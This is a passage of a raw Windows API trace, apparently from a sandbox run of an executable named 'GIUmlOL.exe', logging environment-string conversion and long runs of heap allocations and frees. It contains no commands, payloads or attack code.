lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0182.626] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xc8) returned 0x574860 [0182.626] GetEnvironmentStringsW () returned 0x588100* [0182.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0182.626] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4e6) returned 0x588ae0 [0182.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x588ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0182.806] FreeEnvironmentStringsW (penv=0x588100) returned 1 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x118) returned 0x57a6b0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1f) returned 0x57b5c0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x5798f0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x574fa0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x5805e0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x574fe0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x579c20 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b890 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd) returned 0x573fb0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0x57b710 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x575020 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x15) returned 0x575060 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x574090 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe) returned 0x5725f0 [0182.806] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x69) returned 0x573eb0 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x580950 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0x57b3e0 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x580450 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x573f30 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x573f50 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0x57b410 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b980 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x57ba20 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b9b0 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6b) returned 0x57ba60 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x573f70 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xf) returned 0x57bae0 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0x578d00 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x5882d0 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x588790 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x578d20 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x21) returned 0x57b680 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0x589160 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x22) returned 0x57b320 [0182.807] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x589260 [0182.807] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588ae0 | out: hHeap=0x570000) returned 1 [0182.808] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3a7) returned 0x5893e0 [0182.811] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b350 [0182.811] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3a7) returned 0x593790 [0182.812] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.812] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfef7) returned 0x59db40 [0182.816] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580a40 [0182.816] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfef7) returned 0x5ada40 [0182.818] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b350 | out: hHeap=0x570000) returned 1 [0182.818] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0182.819] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x450) returned 0x588910 [0182.819] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x450) returned 0x5bd940 [0182.819] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.819] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1ea7) returned 0x5bdda0 [0182.819] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xf40) returned 0x5893e0 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7a0) returned 0x58a330 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdda0 | out: hHeap=0x570000) returned 1 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xbf0) returned 0x5893e0 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58a330 | out: hHeap=0x570000) returned 1 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x640) returned 0x588910 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1247) returned 0x5bd940 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x520) returned 0x588910 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1b56) returned 0x5893e0 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8a0) returned 0x5bd940 [0182.821] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x28ed) returned 0x58af40 [0182.822] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.822] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.822] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x550) returned 0x588910 [0182.822] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.822] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2537) returned 0x5bd940 [0182.822] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12b7) returned 0x5893e0 [0182.823] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x950) returned 0x58d840 [0182.823] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.823] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.823] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3d4f) returned 0x58e1a0 [0182.823] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58af40 | out: hHeap=0x570000) returned 1 [0182.824] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58d840 | out: hHeap=0x570000) returned 1 [0182.824] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2377) returned 0x5bd940 [0182.824] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11d7) returned 0x591f00 [0182.824] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8e0) returned 0x5893e0 [0182.825] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.825] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x591f00 | out: hHeap=0x570000) returned 1 [0182.825] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.825] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5b0) returned 0x588910 [0182.825] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.825] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x640) returned 0x588910 [0182.825] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5be2) returned 0x59db40 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58e1a0 | out: hHeap=0x570000) returned 1 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x890) returned 0x5bd940 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xac0) returned 0x5bd940 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b350 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x960) returned 0x5bd940 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x960) returned 0x5be2b0 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x460) returned 0x588910 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe0f) returned 0x5bec20 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be2b0 | out: hHeap=0x570000) returned 1 [0182.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c17) returned 0x5a3730 [0182.826] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe00) returned 0x5bd940 [0182.827] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x700) returned 0x5a5350 [0182.827] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0182.827] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.827] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x153d) returned 0x5a3730 [0182.827] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bec20 | out: hHeap=0x570000) returned 1 [0182.827] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x570000) returned 1 [0182.827] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2277) returned 0x5bd940 [0182.827] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1157) returned 0x5a4c80 [0182.828] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8a0) returned 0x5a5de0 [0182.828] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.828] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4c80 | out: hHeap=0x570000) returned 1 [0182.828] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1fc7) returned 0x5bd940 [0182.828] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0182.828] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5de0 | out: hHeap=0x570000) returned 1 [0182.828] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1657) returned 0x5a3730 [0182.828] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xb20) returned 0x5a4d90 [0182.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x590) returned 0x5bf910 [0182.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0182.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4d90 | out: hHeap=0x570000) returned 1 [0182.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2f96) returned 0x5a3730 [0182.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf910 | out: hHeap=0x570000) returned 1 [0182.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2b47) returned 0x5a66d0 [0182.829] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x15b7) returned 0x5bd940 [0182.830] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xad0) returned 0x5bef00 [0182.830] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0182.830] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.830] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bef00 | out: hHeap=0x570000) returned 1 [0182.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2697) returned 0x5a66d0 [0182.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1367) returned 0x5bd940 [0182.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9a0) returned 0x5becb0 [0182.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0182.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x474d) returned 0x5a66d0 [0182.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0182.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5becb0 | out: hHeap=0x570000) returned 1 [0182.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x920) returned 0x5bd940 [0182.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1b47) returned 0x5bd940 [0182.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xd90) returned 0x5aae30 [0182.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6d0) returned 0x5bf490 [0182.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aae30 | out: hHeap=0x570000) returned 1 [0182.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf490 | out: hHeap=0x570000) returned 1 [0182.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5d0) returned 0x588910 [0182.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6adf) returned 0x5893e0 [0182.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0182.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1887) returned 0x5bd940 [0182.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc30) returned 0x5bf1d0 [0182.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x620) returned 0x588910 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf1d0 | out: hHeap=0x570000) returned 1 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8f0) returned 0x5bd940 [0182.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x480) returned 0x588910 [0182.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x240) returned 0x5be240 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be240 | out: hHeap=0x570000) returned 1 [0182.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580ae0 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b350 | out: hHeap=0x570000) returned 1 [0182.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0182.835] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580ae0 | out: hHeap=0x570000) returned 1 [0182.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9900) returned 0x5893e0 [0182.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bf0) returned 0x5bd940 [0182.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0182.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9937) returned 0x59db40 [0182.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0182.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b350 [0182.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9900) returned 0x5893e0 [0182.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bf0) returned 0x5bd940 [0183.076] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0183.076] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9937) returned 0x5bd940 [0183.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0183.078] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580270 [0183.078] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b350 | out: hHeap=0x570000) returned 1 [0183.078] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x593790 | out: hHeap=0x570000) returned 1 [0183.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ada40 | out: hHeap=0x570000) returned 1 [0183.079] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580a40 | out: hHeap=0x570000) returned 1 [0183.079] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5893e0 [0183.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5a7480 [0183.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x578d40 [0183.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5c7280 [0183.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589060 [0183.080] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d40 | out: hHeap=0x570000) returned 1 [0183.080] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5da490 [0183.081] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x589040 [0183.081] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589060 | out: hHeap=0x570000) returned 1 [0183.081] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5ed6a0 [0183.081] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b4d0 [0183.081] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589040 | out: hHeap=0x570000) returned 1 [0183.081] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x6008b0 [0183.082] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x588350 [0183.082] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b4d0 | out: hHeap=0x570000) returned 1 [0183.082] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x613ac0 [0183.082] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x626cd0 [0183.083] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x57ff50 [0183.083] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588350 | out: hHeap=0x570000) returned 1 [0183.083] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x639ee0 [0183.084] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x64d0f0 [0183.084] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1e90080 [0183.085] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x68) returned 0x578d40 [0183.085] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ff50 | out: hHeap=0x570000) returned 1 [0183.085] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1ea3290 [0183.085] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1eb64a0 [0183.086] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1ec96b0 [0183.086] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1edc8c0 [0183.087] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x98) returned 0x5750b0 [0183.087] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d40 | out: hHeap=0x570000) returned 1 [0183.087] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1eefad0 [0183.087] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f02ce0 [0183.088] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f15ef0 [0183.088] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f29100 [0183.089] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f3c310 [0183.089] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f4f520 [0183.090] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe0) returned 0x574ce0 [0183.090] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5750b0 | out: hHeap=0x570000) returned 1 [0183.090] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1f62730 [0183.091] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x1ff0080 [0183.092] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2003290 [0183.092] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20164a0 [0183.092] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20296b0 [0183.093] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x203c8c0 [0183.093] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x204fad0 [0183.094] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2062ce0 [0183.094] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2075ef0 [0183.095] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x150) returned 0x57b0b0 [0183.095] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574ce0 | out: hHeap=0x570000) returned 1 [0183.095] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2089100 [0183.095] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x209c310 [0183.096] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20af520 [0183.096] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20c2730 [0183.097] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20d5940 [0183.097] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20e8b50 [0183.099] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x20fbd60 [0183.099] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x210ef70 [0183.100] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2122180 [0183.100] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2135390 [0183.101] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21485a0 [0183.102] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x215b7b0 [0183.102] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x216e9c0 [0183.103] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2181bd0 [0183.103] RtlAllocateHeap 